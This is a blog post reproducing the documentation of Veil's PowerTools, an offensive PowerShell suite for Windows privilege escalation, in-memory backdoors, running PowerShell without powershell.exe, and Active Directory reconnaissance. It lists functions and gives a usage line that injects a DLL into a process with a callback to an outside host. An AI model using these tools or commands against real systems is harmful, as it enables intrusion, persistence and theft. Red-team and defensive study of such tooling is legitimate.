Tuesday, 17 November 2015

PowerTools - Collection Of PowerShell Projects With A Focus On Offensive Operations


Veil's PowerTools are a collection of PowerShell projects with a focus on offensive operations.

This collection contains five projects:
  • PowerUp
  • PowerBreach
  • PowerPick
  • PewPewPew
  • PowerView

PowerUp

PowerUp is a powershell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, vulnerable schtasks, and more.

Service Enumeration:

Get-ServiceUnquoted             -   returns services with unquoted paths that also have a space in the name
Get-ServiceFilePermission       -   returns services where the current user can write to the service binary path or its config
Get-ServicePermission           -   returns services the current user can modify

Service Abuse:

Invoke-ServiceUserAdd           -   modifies a modifiable service to create a user and add it to the local administrators
Invoke-ServiceCMD               -   execute an arbitrary command through service abuse
Write-UserAddServiceBinary      -   writes out a patched C# service binary that adds a local administrative user
Write-CMDServiceBinary          -   writes out a patched C# binary that executes a custom command
Write-ServiceEXE                -   replaces a service binary with one that adds a local administrator user
Write-ServiceEXECMD             -   replaces a service binary with one that executes a custom command
Restore-ServiceEXE              -   restores a replaced service binary with the original executable
Invoke-ServiceStart             -   starts a given service
Invoke-ServiceStop              -   stops a given service
Invoke-ServiceEnable            -   enables a given service
Invoke-ServiceDisable           -   disables a given service
Get-ServiceDetail               -   returns detailed information about a service

DLL Hijacking:

Find-DLLHijack                  -   finds .dll hijacking opportunities for currently running processes
Find-PathHijack                 -   finds service %PATH% .dll hijacking opportunities
Write-HijackDll                 -   writes out a hijackable .dll

Registry Checks:

Get-RegAlwaysInstallElevated    -   checks if the AlwaysInstallElevated registry key is set
Get-RegAutoLogon                -   checks for Autologon credentials in the registry
Get-VulnAutoRun                 -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns

Misc.:

Get-VulnSchTask                 -   find schtasks with modifiable target files
Get-UnattendedInstallFile       -   finds remaining unattended installation files
Get-Webconfig                   -   checks for any encrypted web.config strings
Get-ApplicationHost             -   checks for encrypted application pool and virtual directory passwords
Write-UserAddMSI                -   write out a MSI installer that prompts for a user to be added
Invoke-AllChecks                -   runs all current escalation checks and returns a report

PowerBreach

PowerBreach is a backdoor toolkit that aims to provide the user a wide variety of methods to backdoor a system. It focuses on diversifying the "trigger" methods which allows the user flexibility on how to signal to the backdoor that it needs to phone home. PowerBreach focuses on memory only methods that do not persist across a reboot without further assistance and is not a silver bullet when it comes to cover communications.

Helper Functions:

Add-PSFirewallRules - Adds powershell to the firewall on 65K ports. Required Admin
Invoke-CallbackIEX - The location for the various callback mechanisms. Calls back and executes encoded payload.

Backdoors Available:

Invoke-EventLogBackdoor: Monitors for failed RDP login attempts. Admin-Yes, Firewall-No, Auditing Reqd
Invoke-PortBindBackdoor: Binds to TCP Port. Admin-No, Firewall-Yes
Invoke-ResolverBackdoor: Resolves name to decide when to callback. Admin-No, Firewall-No
Invoke-PortKnockBackdoor: Starts sniffer looking for trigger. Admin-Yes, Firewall-Yes
Invoke-LoopBackdoor: Callsback on set interval. Admin-No, Firewall-No
Invoke-DeadUserBackdoor: Looks for "dead" user and calls back when does not exist. Admin-No, Firewall-No

Callback URIs Available:

http://<host:port/resource> - Perform standard http callback
https://<host:port/resource> - Perform standard https callback
dnstxt://<host> - Resolve DNS text record for host which is the payload

PowerPick

This project focuses on allowing the execution of Powershell functionality without the use of Powershell.exe. Primarily this project uses.NET assemblies/libraries to start execution of the Powershell scripts. 

Many thanks to those in the offensive powershell community. This work is not ground breaking but hopefully will motivate offense and defense to understand the implications and lack of protections available.

PSInject.ps1

This project provides a powershell scipt (psinject.ps1) which implements the Invoke-PSInject function. This script is based off Powersploit's Invoke-ReflectivePEInjection and reflectively injects the ReflectivePick DLL. It allows for the replacement of the callback URL that is hard coded into the DLL. See this script for more details. 

The script that it calls back for must be base64 encoded. To do this, you can simply use the built in linux utility 'base64'. 

Example:

import-module psinject.ps1
Invoke-PSInject -Verbose -ProcID 0000 -CBURL http://1.1.1.1/favicon.ico

ReflectivePick

This project is a reflective DLL based on Stephen Fewer's method. It imports/runs a .NET assembly into its memory space that supports the running of Powershell code using System.Management.Automation. Due to its' reflective property, it can be injected into any process using a reflective injector and allows the execution of Powershell code by any process, not just Powershell.exe. It extends inject/migrate capabilities into powershell. 


This DLL is meant to be used with PSInject.ps1 which provide the ability to modify the hardcoded callback URL or with Metasploit after compiling or patching the URL manually.

SharpPick

This project is a .NET executable which allows execution of Powershell code through a number of methods. The script can be embedded as a resource, read from a url, appeneded to the binary, or read from a file. It was originally used as a proof of concept to demonstrate/test the blocking of powershell and bypass of applocker.

Man Page

sharppick.exe [<flag> <argument>]
flags:
-f <file> : Read script from specified file
-r <resource name> : Read script from specified resource
-d <url> : Read script from URL
-a <delimeter> : Read script appended to current binary after specified delimeter. Delimeter should be very very unique string

More SharpPick details here

PewPewPew

This repo contains scripts that utilize a common pattern to host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server, and then post-process any results.

More details here

PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows "net *" commands, which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality.


It also impements various useful metafunctions, including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist. See function descriptions for appropriate usage and available options.


To run on a machine, start PowerShell with "powershell -exec bypass" and then load the PowerView module with: PS> Import-Module .\powerview.psm1 or load the PowerView script by itself: PS> Import-Module .\powerview.ps1


For detailed output of underlying functionality, pass the -Debug flag to most functions.


For functions that enumerate multiple machines, pass the -Verbose flag to get a progress status as each host is enumerated. Most of the "meta" functions accept an array of hosts from the pipeline.

Misc Functions:

Export-PowerViewCSV             -   thread-safe CSV append
Set-MacAttribute                -   Sets MAC attributes for a file based on another file or input (from Powersploit)
Copy-ClonedFile                 -   copies a local file to a remote location, matching MAC properties
Get-IPAddress                   -   resolves a hostname to an IP
Test-Server                     -   tests connectivity to a specified server
Convert-NameToSid               -   converts a given user/group name to a security identifier (SID)
Convert-SidToName               -   converts a security identifier (SID) to a group/user name
Convert-NT4toCanonical          -   converts a user/group NT4 name (i.e. dev/john) to canonical format
Get-Proxy                       -   enumerates local proxy settings
Get-PathAcl                     -   get the ACLs for a local/remote file path with optional group recursion
Get-UserProperty                -   returns all properties specified for users, or a set of user:prop names
Get-ComputerProperty            -   returns all properties specified for computers, or a set of computer:prop names
Find-InterestingFile            -   search a local or remote path for files with specific terms in the name
Invoke-CheckLocalAdminAccess    -   check if the current user context has local administrator access to a specified host
Get-DomainSearcher              -   builds a proper ADSI searcher object for a given domain
Get-ObjectAcl                   -   returns the ACLs associated with a specific active directory object
Add-ObjectAcl                   -   adds an ACL to a specified active directory object
Invoke-ACLScanner               -   enumerate -1000+ modifable ACLs on a specified domain
Get-GUIDMap                     -   returns a hash table of current GUIDs -> display names
Get-DomainSID                   -   return the SID for the specified domain
Invoke-ThreadedFunction         -   helper that wraps threaded invocation for other functions

net * Functions:

Get-NetDomain                   -   gets the name of the current user's domain
Get-NetForest                   -   gets the forest associated with the current user's domain
Get-NetForestDomain             -   gets all domains for the current forest
Get-NetDomainController         -   gets the domain controllers for the current computer's domain
Get-NetUser                     -   returns all user objects, or the user specified (wildcard specifiable)
Add-NetUser                     -   adds a local or domain user
Get-NetComputer                 -   gets a list of all current servers in the domain
Get-NetPrinter                  -   gets an array of all current computers objects in a domain
Get-NetOU                       -   gets data for domain organization units
Get-NetSite                     -   gets current sites in a domain
Get-NetSubnet                   -   gets registered subnets for a domain
Get-NetGroup                    -   gets a list of all current groups in a domain
Get-NetGroupMember              -   gets a list of all current users in a specified domain group
Get-NetLocalGroup               -   gets the members of a localgroup on a remote host or hosts
Add-NetGroupUser                -   adds a local or domain user to a local or domain group
Get-NetFileServer               -   get a list of file servers used by current domain users
Get-DFSshare                    -   gets a list of all distribute file system shares on a domain
Get-NetShare                    -   gets share information for a specified server
Get-NetLoggedon                 -   gets users actively logged onto a specified server
Get-NetSession                  -   gets active sessions on a specified server
Get-NetRDPSession               -   gets active RDP sessions for a specified server (like qwinsta)
Get-LastLoggedOn                -   return the last logged on user for a target host
Get-NetProcess                  -   gets the remote processes and owners on a remote server
Get-UserEvent                   -   returns logon or TGT events from the event log for a specified host
Get-ADObject                    -   takes a domain SID and returns the user, group, or computer 
                                    object associated with it
Set-ADObject                    -   takes a SID, name, or SamAccountName to query for a specified
                                    domain object, and then sets a specified 'PropertyName' to a
                                    specified 'PropertyValue'

GPO functions

Get-GptTmpl                     -   parses a GptTmpl.inf to a custom object
Get-NetGPO                      -   gets all current GPOs for a given domain
Get-NetGPOGroup                 -   gets all GPOs in a domain that set "Restricted Groups" 
                                    on on target machines
Find-GPOLocation                -   takes a user/group and makes machines they have effective
                                    rights over through GPO enumeration and correlation
Find-GPOComputerAdmin           -   takes a computer and determines who has admin rights over it
                                    through GPO enumeration
Get-DomainPolicy                -   returns the default domain or DC policy

User-Hunting Functions:

Invoke-UserHunter               -   finds machines on the local domain where specified users are logged into, and can optionally check if the current user has local admin access to found machines
Invoke-StealthUserHunter        -   finds all file servers utilizes in user HomeDirectories, and checks the sessions one each file server, hunting for particular users
Invoke-ProcessHunter            -   hunts for processes with a specific name or owned by a specific user on domain machines
Invoke-UserEventHunter          -   hunts for user logon events in domain controller event logs

Domain Trust Functions:

Get-NetDomainTrust              -   gets all trusts for the current user's domain
Get-NetForestTrust              -   gets all trusts for the forest associated with the current user's domain
Find-ForeignUser                -   enumerates users who are in groups outside of their principal domain
Find-ForeignGroup               -   enumerates all the members of a domain's groups and finds users that are outside of the queried domain
Invoke-MapDomainTrust           -   try to build a relational mapping of all domain trusts

MetaFunctions:

Invoke-ShareFinder              -   finds (non-standard) shares on hosts in the local domain
Invoke-FileFinder               -   finds potentially sensitive files on hosts in the local domain
Find-LocalAdminAccess           -   finds machines on the domain that the current user has local admin access to
Find-UserField                  -   searches a user field for a particular term
Find-ComputerField              -   searches a computer field for a particular term
Get-ExploitableSystem           -   finds systems likely vulnerable to common exploits
Invoke-EnumerateLocalAdmin      -   enumerates members of the local Administrators groups across all machines in the domain

No comments:

Post a Comment